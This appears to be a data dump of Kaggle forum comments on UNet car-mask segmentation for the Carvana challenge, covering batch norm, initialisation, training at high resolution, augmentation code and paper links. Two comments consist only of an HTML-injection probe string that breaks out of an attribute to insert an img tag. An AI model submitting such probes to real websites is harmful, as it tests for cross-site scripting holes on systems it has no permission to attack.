    "209440": "bang liu\n\nThank you for the comments. I corrected the typo error. It should be 512x512. ' ... no bn layers ...' Maybe I can try without BN layer too. In that case, I can use greater batch size or higher resolution. Thanks!\n\nNote: without BN, it is easy to try in multi-gpu (and also fp16 which i try before on cifar10 before)",
    "209451": "bang liu\n\nhow do you initialise your Unet without BN? Tried just now at my side. The UNet won't run at training  unless good initialization is given (I can merge BN in conv to do a initialization for the weights). Since the images are more or less similar, maybe that is why BN may not be that important here. Without BN, i can increase batch size from 16 to 20. The speed is faster too.",
    "209460": "When you train Unet without BN you have to use much lower learning rate (in range 1e-4 or lower) and longer training",
    "209465": "Heng CherKeng\nHow long does 1 epoch take (on your 1080TI/Titan?) to train for the 0.996 net?",
    "209466": "5.6 min using pascal titianX. The log file can be found at the google drive. see 08-20 and 07-31.\nI run about 35 epoch.",
    "209467": "if i got time, i am going to try this: https://github.com/ducha-aiki/LSUV-pytorch",
    "209471": "I have not using special init method,but random normal(mean=0,std=filter_width*filter_height*channel).\nthese pic are too same,so DA and BN these method which can lead noise will be harmful .\nthe best way is increase the input size,but I gauss we can't over 0.998 because of ground true error.",
    "209480": "I am struggling to replicate the performance ~0.99xx with keras. Only getting ~0.97x after 20 epochs with 8 batch size\nFind below the model in keras\n\n\n    inputs = Input((img_rows, img_cols, 3))\n    conv1 = Conv2D(16, (3, 3), activation='relu', padding='same', name = 'layer1.1')(inputs)\n    conv1 = BatchNormalization()(conv1)\n    conv1 = Conv2D(16, (3, 3), activation='relu', padding='same', name = 'layer1.2')(conv1)\n    conv1 = BatchNormalization()(conv1)\n    pool1 = MaxPooling2D(pool_size=(2, 2), name = 'layer1.3')(conv1)\n\n    conv2 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer2.1')(pool1)\n    conv2 = BatchNormalization()(conv2)\n    conv2 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer2.2')(conv2)\n    conv2 = BatchNormalization()(conv2)\n    pool2 = MaxPooling2D(pool_size=(2, 2), name = 'layer2.3')(conv2)\n\n    conv3 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer3.1')(pool2)\n    conv3 = BatchNormalization()(conv3)\n    conv3 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer3.2')(conv3)\n    conv3 = BatchNormalization()(conv3)\n    pool3 = MaxPooling2D(pool_size=(2, 2), name = 'layer3.3')(conv3)\n\n    conv4 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer4.1')(pool3)\n    conv4 = BatchNormalization()(conv4)\n    conv4 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer4.2')(conv4)\n    conv4 = BatchNormalization()(conv4)\n    pool4 = MaxPooling2D(pool_size=(2, 2), name = 'layer4.3')(conv4)\n\n    conv5 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer5.1')(pool4)\n    conv5 = BatchNormalization()(conv5)\n    conv5 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer5.2')(conv5)\n    conv5 = BatchNormalization()(conv5)\n    pool5 = MaxPooling2D(pool_size=(2, 2), name = 'layer5.3')(conv5)\n    \n    conv6 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer6.1')(pool5)\n    conv6 = BatchNormalization()(conv6)\n    conv6 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer6.2')(conv6)\n    conv6 = BatchNormalization()(conv6)\n    pool6 = MaxPooling2D(pool_size=(2, 2), name = 'layer6.3')(conv6)\n    \n    conv7 = Conv2D(1024, (3, 3), activation='relu', padding='same', name = 'layer7.1')(pool6)\n    conv7 = BatchNormalization()(conv7)\n    conv7 = Conv2D(1024, (3, 3), activation='relu', padding='same', name = 'layer7.2')(conv7)\n    conv7 = BatchNormalization()(conv7)\n    \n    up8 = concatenate([Conv2DTranspose(512, (2, 2), strides=(2, 2), padding='same', name = 'layer8.0')(conv7), conv6], axis=3, name = 'layer8.01')\n    conv8 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer8.1')(up8)\n    conv8 = BatchNormalization()(conv8)\n    conv8 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer8.2')(conv8)\n    conv8 = BatchNormalization()(conv8)\n    \n    up9 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same', name = 'layer9.0')(conv8), conv5], axis=3, name = 'layer9.01')\n    conv9 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer9.1')(up9)\n    conv9 = BatchNormalization()(conv9)\n    conv9 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer9.2')(conv9)\n    conv9 = BatchNormalization()(conv9)\n    \n    up10 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same', name = 'layer10.0')(conv9), conv4], axis=3, name = 'layer10.01')\n    conv10 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer10.1')(up10)\n    conv10 = BatchNormalization()(conv10)\n    conv10 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer10.2')(conv10)\n    conv10 = BatchNormalization()(conv10)\n\n    up11 = concatenate([Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same', name = 'layer11.0')(conv10), conv3], axis=3, name = 'layer11.01')\n    conv11 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer11.1')(up11)\n    conv11 = BatchNormalization()(conv11)\n    conv11 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer11.2')(conv11)\n    conv11 = BatchNormalization()(conv11)\n\n    up12 = concatenate([Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same', name = 'layer12.0')(conv11), conv2], axis=3, name = 'layer12.01')\n    conv12 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer12.1')(up12)\n    conv12 = BatchNormalization()(conv12)\n    conv12 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer12.2')(conv12)\n    conv12 = BatchNormalization()(conv12)\n\n    up13 = concatenate([Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same', name = 'layer13.0')(conv12), conv1], axis=3, name = 'layer13.01')\n    conv13 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer13.1')(up13)\n    conv13 = BatchNormalization()(conv13)\n    conv13 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer13.2')(conv13)\n    conv13 = BatchNormalization()(conv13)\n\n    conv14 = Conv2D(1, (1, 1), activation='sigmoid')(conv13)\n    # conv14 = BatchNormalization()(conv14)\n\n    model = Model(inputs=[inputs], outputs=[conv14])",
    "209520": "I didn't have time for this competition yet, but I was planning to take the approach you suggest: input all images rotations and output all masks at once.\n\nOther things to consider:\n\n- Don't go too deep on UNet, as masks are placed more or less on the same region. Instead, replace the two deepest levels with a \"global convolution\" (a convolution with kernel size equal to the side of the image at that level). The number of filters should not be more than the number of cars. This way, we may reduce the number of parameters and probably create a viable 1024x1024 version.\n\n- I'd suggest adding an \"upscale\" network to the workflow, after training and predicting the UNet. The input should be patches from original image stacked with the UNet output (channels R, G, B and Mask). These patches should always include border regions of mask (black and white pixels).\n\nFinal note: I'd suggest reading this recent post about image segmentation thechniques:\n- http://blog.qure.ai/notes/semantic-segmentation-deep-learning-review",
    "209545": "bang liu   and  @Sergey Mushinskiy\n\nThank you for the comments. The initialization and learning rate are magical. I am running the experiments now, using unet512 without bn. The convergence rate is a bit slower, but time per epoch is reduced from  3 min to 2.2 min. Attached is the loss convergence of epoch-1. I will post experiment curve of with and without bn when my experiments are completed. Thanks again!\n \n[https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6972/results-small-epoch-1.avi][1] (red=ground_truth, green=prediction. if ground_truth==green, you should see only yellow)\n\n\n\n    class UNet512_no_bn_2 (nn.Module):\n\n    def __init__(self, in_shape, num_classes):\n        super(UNet512_no_bn_2, self).__init__()\n        in_channels, height, width = in_shape\n\n        self.down1 = nn.Sequential(\n            *make_conv_relu(in_channels, 16, kernel_size=3, stride=1, padding=1 ),\n            *make_conv_relu(16, 16, kernel_size=3, stride=1, padding=1 ),\n        )\n        ..... \n\n        self.classify = nn.Conv2d(16, num_classes, kernel_size=1, stride=1, padding=0 )\n\n        ## initialistaion\n        #  https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37208\n        #  bang liu : random normal(mean=0,std=filter_width*filter_height*channel).\n\n        for m in self.modules():\n            if isinstance(m, nn.Conv2d):\n                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n                m.weight.data.normal_(0, math.sqrt(2. / n))\n\n\n    def forward(self, x):\n\n        down1 = self.down1(x)\n        out   = F.max_pool2d(down1, kernel_size=2, stride=2) #64\n\n        down2 = self.down2(out)\n        out   = F.max_pool2d(down2, kernel_size=2, stride=2) #64\n        .....\n        out   = self.classify(out)\n\n        return out\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6972/results-small-epoch-1.avi",
    "209598": "In your next update, could you publish your Split folder?  I can't tell which images you used in the test_3197 file.  Many thanks!",
    "209642": "Coded up a U-nets implementation [here][1] that is relevant to this post! Let me know what you thing!\n\n\n  [1]: https://www.kaggle.com/ecobill/u-nets-with-keras/",
    "209652": "my implementation here https://www.kaggle.com/ecobill/u-nets-with-keras/",
    "209699": "i have added to the 07-30 release. test_3197 is for visualization only. it is not used in training and will not affect results.",
    "209701": "Bruno G. do Amaral\n \n\"I'd suggest adding an \"upscale\" network ...\" thank you for your comment. i am thinking of this too. I am looking at refineNet. I am thinking if i want to do it end-to-end (which require large memory) or train  separate networks stagewise, with a network output feed into the input of another stage.\n\nit can be as simple as two-stage or three stage.\n\nThanks for the link! Here is another link for review of segmentation:\nhttps://meetshah1995.github.io/semantic-segmentation/deep-learning/pytorch/visdom/2017/06/01/semantic-segmentation-over-the-years.html",
    "209709": "anyone using dilated convolution here? Does it improves results?",
    "209754": "Barek \nI have tried your method and it works well for me.  \nI don't have to save a 104GB numpy array on my local anymore.  \nInstead the size shrink to only 26GB when the uint8 array of size 100000x512x512 is saved.  \nHowever, I have used another way to allocate numpy array first by using ```np.memmap(outdir, dtype=np.uint8, mode='w+', shape=(100064,512,512))```.  \nBy doing this I don't have to read the entire array into my memory.",
    "209782": "I would love to, but I think dilated convolutions do increase memory consumption a lot (and it seems like many configurations of cudnn/pytorch are not optimised for dilation?)",
    "209784": "Does pytorch has dilated layer?",
    "209899": "http://pytorch.org/docs/master/nn.html#convolution-layers\nYea I think the dilation parameter does control dilation",
    "210016": "How much RAM do you use @Heng CherKeng? I even got problem loading the training images. Sorry for a dump question, I'm new to the field.",
    "210017": "i have 128GB ram. check the code and set is_preload=False in the dataset init function.",
    "210018": "training at original resolution! I crop 1024x1024 from the original image. The results look good. The spikes in my previous 1024 attempt is due to small batch size. I think you need at least batch_size = 32 (use caffe accumulate gradient trick, i.e. iter_size in the prototxt file) blue=batch_size_8, red = batch_size_32. This is a new unet using 1024 as input and 1024 as output.\n\nMy feeling is that is will be a 0.997 solution. To get to 0.998, some refinement strategy is required.\n\n ![enter image description here][1]\n ![enter image description here][2]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/210018/6982/loss_1024_crop0.png\n  [2]: https://kaggle2.blob.core.windows.net/forum-message-attachments/210018/6980/0d1a9caf4350_02.jpg",
    "210019": "Thank you so much ^^",
    "210032": "i try 5x5 filter. it does improve the results a little but is very slow and some overfitting. so i am thinking that dilated conv might help.",
    "210038": "yet another idea. background prediction model:\nrgb --&gt;[feature_net]--&gt;predicted_background_rgb--&gt;z=abs(predicted_background_rgb-rgb--&gt;sigmoid[scale(z+shift)]--&gt;loss",
    "210039": "But using dilated conv will cost too much memory(maybe 4~8 times),or you will also downsample the feature map ?",
    "210040": "boundary refinement:\n    \"Laplacian Pyramid Reconstruction and Refinement for Semantic Segmentation\" -  G. Ghiasi, C. Fowlkes, eccv 2016\n    \nhttp://www.ics.uci.edu/~gghiasi/\n\nsmart idea to detect the boundary using max and inverted max pooling\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/210040/6983/xx1.png",
    "210041": "Rethinking Atrous Convolution for Semantic Image Segmentation\n    Submitted on 17 Jun 2017\n    Arxiv Link\n\n  ![enter image description here][1]\n  \n\n  ![enter image description here][2]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6984/deeplabv3.png\n  [2]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6990/context.png",
    "210075": "Reply for your first doubt  \n1. using bilinear upsampling is better than deconvolution layer in unet (which i don't know why ... i suspect overfitting)  \nIt might be that deconvolutions tend to introduce characteristic artifacts, you can check out this.",
    "210078": "By training in 1024x1024, I am wondering how to predict the result under 1918 * 1280?",
    "210079": "![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6985/2x1024.png",
    "210117": "After reading http://tanbakuchi.com/posts/comparison-of-openv-interpolation-algorithms/ I've checked the best interpolation method for our masks again with N=500, width=384 and height=256:\n![Interpolation Comparision][1]\n\n  [1]: http://i.imgur.com/hlCbamW.png",
    "210144": "That's cool. But how to make sure the patch cover all the car if it's facing towards you or backwards? I haven't checked all the  images",
    "210149": "you can get bounding box from initial estimate\n \n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6987/two-stage.png",
    "210207": "How long does it take for you to predict all test images + generate RLE file?\n\nI managed to train at native resolution (1918x1280), left it training for ~1 day but predictions + RLE will take ~15-20 hours...",
    "210210": "generate RLE  takes 20 min\n(see kernel section for fast RLE)\n\njust prediction at 1024x1024 takes 1 to 2 hr.\nbut there are overheads like storing 1024x1024 probability to disk, etc",
    "210220": "i changed my strategy. From my experiments, direct prediction from full resolution or slightly smaller (e.g 1024x1916) can also work. so there is no need to divide into crops, etc",
    "210235": "UNets seem to be working great for you! How do you manage memory consumption with this image size? I guess for most UNets this is too big to even fit a single image into memory?",
    "210293": "surprising, max no. of images for 1024x1916 is 8. i use 12 GB pascal titanx. as long as you can stable BN moving statistics, you can:\n\n    enter code here\n\n    print ('batch_size*num_grad_acc')  \n    for epoch in range(start_epoch, num_epoches):   \n      \n        adjust_learning_rate(optimizer, lr/num_grad_acc)\n        rate =  get_learning_rate(optimizer)[0]*num_grad_acc  \n  \n        net.train()\n        for it, (images, labels, indices) in enumerate(train_loader, 0):\n            images  = Variable(images.cuda())\n            labels  = Variable(labels.cuda())\n\n            #forward\n            logits = net(images)\n            probs  = F.sigmoid(logits)\n            masks  = (probs&gt;0.5).float()\n\n\n            #backward\n            loss = criterion(logits, labels)\n            # optimizer.zero_grad()\n            # loss.backward()\n            # optimizer.step()\n\n            # accumulate gradients\n            if it==0:\n                optimizer.zero_grad()\n            loss.backward()\n            if it%num_grad_acc==0:\n                optimizer.step()\n                optimizer.zero_grad()  # assume no effects on bn for accumulating grad\n\n`",
    "210315": "https://www.semanticscholar.org/paper/Label-Refinement-Network-for-Coarse-to-Fine-Semant-Islam-Naha/3b60af814574ebe389856e9f7008bb83b0539abc\n\nsee also the cvpr 2017 paper:\nGated feedback refinement network for dense image labeling\n\nwww.cs.umanitoba.ca/~ywang\n\n ![enter image description here][1]\n\n\n  [1]: https://ai2-s2-public.s3.amazonaws.com/figures/2016-11-08/3b60af814574ebe389856e9f7008bb83b0539abc/1-Figure1-1.png",
    "210317": "if you want ot use TTA (test time augmentation), you may need to find ways to speed up inference. here is a trick.\n\n\"In order to speed up inference time, we use the following\nequations to remove the batch normalization layer in our\nnetwork at test time.\"\n\nDSSD : Deconvolutional Single Shot Detector \n\nhttp://www.cs.unc.edu/~cyfu/\n\n\nsimilar trick is used in Intel's PVANet:\n\nhttps://github.com/sanghoon/pva-faster-rcnn/issues/5",
    "210345": "Interesting. Is inference time already a bottleneck for you?",
    "210357": "So what's the batch size here and num_grad_acc? I guess training time takes a hit though at this size?",
    "210389": "it takes 14 min to train for 1024x2048 per epoch (actaully 2~3 min is due to data augmentation). effective_batch_size = num_grad_accxbtach_size can be 4x8=32 or 4x16=64. i am still experimentally. and yes, the effective_batch_size does affect results",
    "210392": "\"&gt;<img src=\"x\">/",
    "210393": "\"&gt;<img src=\"x\">/",
    "210394": "it seems that there are quite some work that deal with full resolution segmentation. Also my current unet use stacked 3x3 filters (like vgg-16). Here are some papers that uses residual block, etc to repalce it. They claimed better accuracy and efficiency.\n\n\"Efficient ConvNet for Real-time Semantic Segmentation\"- Eduardo Romera1, Jose´ M. A´ lvarez2, Luis M. Bergasa1 and Roberto Arroyo\n\n\"LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation\" - Abhishek Chaurasia\n\n\" Not All Pixels Are Equal: Difficulty-Aware Semantic Segmentation via Deep Layer Cascade\" - Xiaoxiao Li\n\n\"ICNet for Real-Time Semantic Segmentation on High-Resolution Images\"- Hengshuang Zhao1\n\n\"Improving Fully Convolution Network for Semantic Segmentation\" - Bing Shuai\n\n\"Full-Resolution Residual Networks for Semantic Segmentation in Street Scenes\" - Tobias Pohlen\n\n\"The One Hundred Layers Tiramisu: Fully Convolutional DenseNets for Semantic Segmentation\" - Simon J´egou1\n\n\"ENet: A Deep Neural Network Architecture for Real-Time Semantic Segmentation\" - Adam Paszke",
    "210997": "deleted comment - I was wrong",
    "211110": "Heng et al, Does anyone have success with CRF as post-processing?\n\nOriginal paper on Gaussian CRF: \nhttps://arxiv.org/abs/1210.5644",
    "211115": "This is excellent!!",
    "211268": "Full-Resolution Residual Networks for Semantic Segmentation in Street Scenes\n\nhttps://www.youtube.com/watch?v=aXdigiSDIak\n\nhttps://github.com/TobyPDE/FRRN",
    "211358": "here is another benchmark to compare different methods:\n\nhttps://www.cityscapes-dataset.com/benchmarks/",
    "211425": "Did you give it a try?",
    "211618": "Hi Heng!\nThanks for your kernel.\nBTW I see you redefined forward pass, but I don't see any redefinition of backward.\nHave you done it?\nIf not - why? do you think it's good idea to have different backward and forward ways?",
    "211689": "I got the error said:\n\nRuntimeError: cuda runtime error (46) : all CUDA-capable devices are busy or unavailable at pytorch/torch/lib/THC/generic/THCStorage.cu:66\n\nCould someone help me?",
    "211697": "Try restarting the machine",
    "211773": "I'm not Heng, but if you don't mind I will answer your question:\nIn pytorch there is no need to define a backward path explicitly if using the autograd package. The path is generated implicitly from the forward path and stored in the autograd-variables. Therefore the backward path should be 'the reverse forward path' implicitly.",
    "211808": "It's university cluster so I cannot control the machine",
    "211907": "Did you set the 'CUDA_VISIBLE_DEVICES' Variable?",
    "212248": "another pytorch segmentation open source:\n\nhttps://github.com/ycszen/pytorch-ss",
    "212369": "experiments for weighing pixels at the boundary. see attachment pictures.\n\nwithout  weighing:  \n\ntrain=0.9934, validate=0.9940, LB=0.991\n\nwith weighing:  \n\ntrain=0.9942, validate=0.9945, LB=0.991\n\n  ![enter image description here][1]\n  ![enter image description here][2]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/212369/7044/weighted_dice_1.png\n  [2]: https://kaggle2.blob.core.windows.net/forum-message-attachments/212369/7045/weighted_dice_2.png",
    "212412": "data augmentation\n\nhttp://ee.sharif.edu/~shayan_f/fgcc/index.html\n\n ![enter image description here][1]\n\n\n  [1]: http://ee.sharif.edu/~shayan_f/fgcc/imgs/color1.png",
    "212703": "I'm testing a Hue/Saturation/Value augmentation. Looks promising so far, will update with results soon hopefully. My concern is that most cars in train/test sets are black, white or shade of gray and the hue/saturation adjustments don't have much of an effect there.\n\n![enter image description here][1]\n\n\n  [1]: https://image.prntscr.com/image/R2F_OexrROmTMgUloNmeGQ.png",
    "212895": "smart post precocessing!\nThe car is symmetrical. this can be use to correct segmentation error. e.g. in a frontal car, if missing segementation occurs at one side, it can be easily detected. some reasoning goes for car turned at 30 degree left and right.\n\nbetter still, try a deep CNN to detect and correct such error, or incorperate such symmtrical information in the network",
    "213215": "Bruno G. do Amaral\n\nThis cvpr 2017 oral paper has some ideas similar to yours:\n\nhttps://sites.google.com/view/deepimagematting\n\n\"Deep Image Matting\" - Ning Xu, CVPR 2017\n\nThe input to the second stage of our network is the concatenation of an image patch and its alpha prediction from the first stage (scaled between 0 and\n255), resulting in a 4-channel input. The output is the corresponding\nground truth alpha matte. The network is a fully convolutional network which includes 4 convolutional layers. Each of the first 3 convolutional layers is followed by a non-linear “ReLU” layer. There are no downsampling layers since we want to keep very subtle structures missed in the first stage.",
    "213279": "I trained a model on 1024x1024 images, with batch size 1. I'm getting these crazy artifacts in some images, resulting in a lower than expected LB score. I'm not sure if this could be related to the small batch size. Or should I be looking for errors in my upscaling methods? Did anyone encounter similar artifacts? For most images, the predictions are fine, so that the public LB score is 0.965. \n\n![example][1]\n\n\n  [1]: https://i.imgur.com/hH3AW8K.png",
    "213331": "TTA (test time augmentation) on validation set. CNN model is 1024x1024 input\n\nif performed on the test set (100064 images), each augmentation is going to take 2 hr. Hence the cost is roughly 12 hr for 0.000035 gain in LB!\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/213331/7089/augment.png",
    "213506": "I didn't change that, I suppose to have 1 K80 GPU available",
    "213705": "you hue augmentation looks good. do you have a code for that?",
    "213713": "def randomHueSaturationValue(image, hue_shift_limit=(-180, 180),\n                                 sat_shift_limit=(-255, 255),\n                                 val_shift_limit=(-255, 255), u=0.5):\n        if np.random.random() &lt; u:\n            image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n            h, s, v = cv2.split(image)\n            hue_shift = np.random.uniform(hue_shift_limit[0], hue_shift_limit[1])\n            h = cv2.add(h, hue_shift)\n            sat_shift = np.random.uniform(sat_shift_limit[0], sat_shift_limit[1])\n            s = cv2.add(s, sat_shift)\n            val_shift = np.random.uniform(val_shift_limit[0], val_shift_limit[1])\n            v = cv2.add(v, val_shift)\n            image = cv2.merge((h, s, v))\n            image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)\n\n        return image\n\n    img = randomHueSaturationValue(img,\n                                   hue_shift_limit=(-50, 50),\n                                   sat_shift_limit=(-5, 5),\n                                   val_shift_limit=(-15, 15))",
    "213727": "thanks!",
    "215233": "code for merging removing BN in inference, by merging into CONV.\nI have verify that conv-bn-relu preduced the same results as merged_conv-relu. It is about 10% faster.\n\nIn addition, fp16 works and produce same results (about 0.00001 numerical error difference). It can increase inference batch size by about 40%.\n\nIn pytorch you just have to use:\n\nnet.cuda().half()\n\nVariable(images,volatile=True).cuda().half()\n\n\n      class ConvBnRelu2d(nn.Module):\n          def __init__(self, in_channels, out_channels, kernel_size=3, padding=1, dilation=1, stride=1, groups=1, is_bn=True, is_relu=True):\n              super(ConvBnRelu2d, self).__init__()\n              self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, stride=stride, dilation=dilation, groups=groups, bias=False)\n              self.bn   = nn.BatchNorm2d(out_channels, eps=BN_EPS)\n              self.relu = nn.ReLU(inplace=True)\n              if is_bn   is False: self.bn  =None\n              if is_relu is False: self.relu=None\n      \n      \n          def forward(self,x):\n              x = self.conv(x)\n              if self.bn   is not None: x = self.bn(x)\n              if self.relu is not None: x = self.relu(x)\n              return x\n      \n      \n          def merge_bn(self):\n              assert(self.conv.bias==None)\n              conv_weight     = self.conv.weight.data\n              bn_weight       = self.bn.weight.data\n              bn_bias         = self.bn.bias.data\n              bn_running_mean = self.bn.running_mean\n              bn_running_var  = self.bn.running_var\n              bn_eps          = self.bn.eps\n      \n              #https://github.com/sanghoon/pva-faster-rcnn/issues/5\n              #https://github.com/sanghoon/pva-faster-rcnn/commit/39570aab8c6513f0e76e5ab5dba8dfbf63e9c68c\n      \n              N,C,KH,KW = conv_weight.size()\n              std = 1/(torch.sqrt(bn_running_var+bn_eps))\n              std_bn_weight =(std*bn_weight).repeat(C*KH*KW,1).t().contiguous().view(N,C,KH,KW )\n              conv_weight_hat = std_bn_weight*conv_weight\n              conv_bias_hat   = (bn_bias - bn_weight*std*bn_running_mean)\n      \n              self.bn   = None\n              self.conv = nn.Conv2d(in_channels=self.conv.in_channels, out_channels=self.conv.out_channels, kernel_size=self.conv.kernel_size,\n                                    padding=self.conv.padding, stride=self.conv.stride, dilation=self.conv.dilation, groups=self.conv.groups,\n                                    bias=True)\n              self.conv.weight.data = conv_weight_hat #fill in\n              self.conv.bias.data   = conv_bias_hat",
    "215665": "I'm wondering if your weighted dice loss only weights the positive class. Because `intersection = m1 * m2`, the intersection will be equal to zero wherever the mask (= true label) is zero. Hence, you end up doing `w2 * 0` for the negative class. In my mind you're ignoring the weighting of the negative class here.\n\nPlease tell me if I'm missing something.",
    "216022": "Thank you for sharing! It helps me a lot.\n\nHave you  tried PSPNet in your code? I want to know how the model performs in the carvana dataset.",
    "216075": "I've tried pspnet - it was performing really bad..",
    "216158": "Sad... I intended to try ensemble PSPNet with other model...\n\nI appreciate hearing that :)",
    "216381": "Heng, what IDE do you use?",
    "216382": "pycharm",
    "216500": "I implemented your weighted_bce_loss and tested it, but the returned negative large number. (e.g. dice_score : around 0.98, weighted_bce_loss : -600~)\n\nIs it OK?",
    "216548": "Hi @Heng, thanks for your sharing. I got useful knowledge from them. Since I am a new CVer,  I am not familiar with CV algorithms. I used dilation to determine which pixel to be weighed. Is it feasible? Looking forward to your reply.",
    "216554": "lyakaap\n\nloss can not be negative.  I am not sure why this error happens at your side.\n\n.\n\n@malcolm\n\ni think it is ok. just do experiments with and without weighing and the results will show if it works.",
    "216639": "I also thought it's incorrect that loss would be negative, but contrast  intuition, still it worked properly.\nOn the contrary, I tried to flip the sign of function output. The result is poor and obviously incorrect.\n\nThank you for answering. I will review my implementation and recalculate bce_loss formula.",
    "216783": "",
    "218192": "Heng, which image input size did you use ?",
    "218603": "some pytorch addon:\n\n -  dense-CRF: https://github.com/milesial/Pytorch-UNet\n\n -  ReduceLROnPlateau:  https://github.com/EKami/carvana-challenge\n\n - inception/densenet block in unet: https://github.com/Hsuxu/carvana-pytorch-uNet\n\nfor more see: https://github.com/search?utf8=%E2%9C%93&amp;q=carvana&amp;type=",
    "221167": "Example of dilated Unet\n\nhttps://blog.insightdatascience.com/heart-disease-diagnosis-with-deep-learning-c2d92c27e730",
    "221201": "Great thread, I am also using PyTorch, Just uploaded my tutorial here:\nhttps://www.kaggle.com/solomonk/pytorch-numer-ai-deep-binary-classification",
    "221385": "It seemed that the dilated convolution layer lower the loss of feature information comparing to downsampling/unsampling layer. But it requires more parameters, so we have to reduce the input size or the depth of the net to adapt to our memory. Did it count?",
    "222606": "what is split_file? thanks\n\nP.S. is going through all py to find how to generate it, thx a lot if you can give hint.",
    "222649": "list of training/validation images. i think you can find it in one of the version 07-30. But my software changes. it would be easier for you to read the code and check the format of the file for later versions.",
    "2869307": "(https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U) Hello, I am a cv novice and want to learn the implementation of your model. The link you shared cannot be opened, could you please share it again?"
  },
  "source": "meta"
}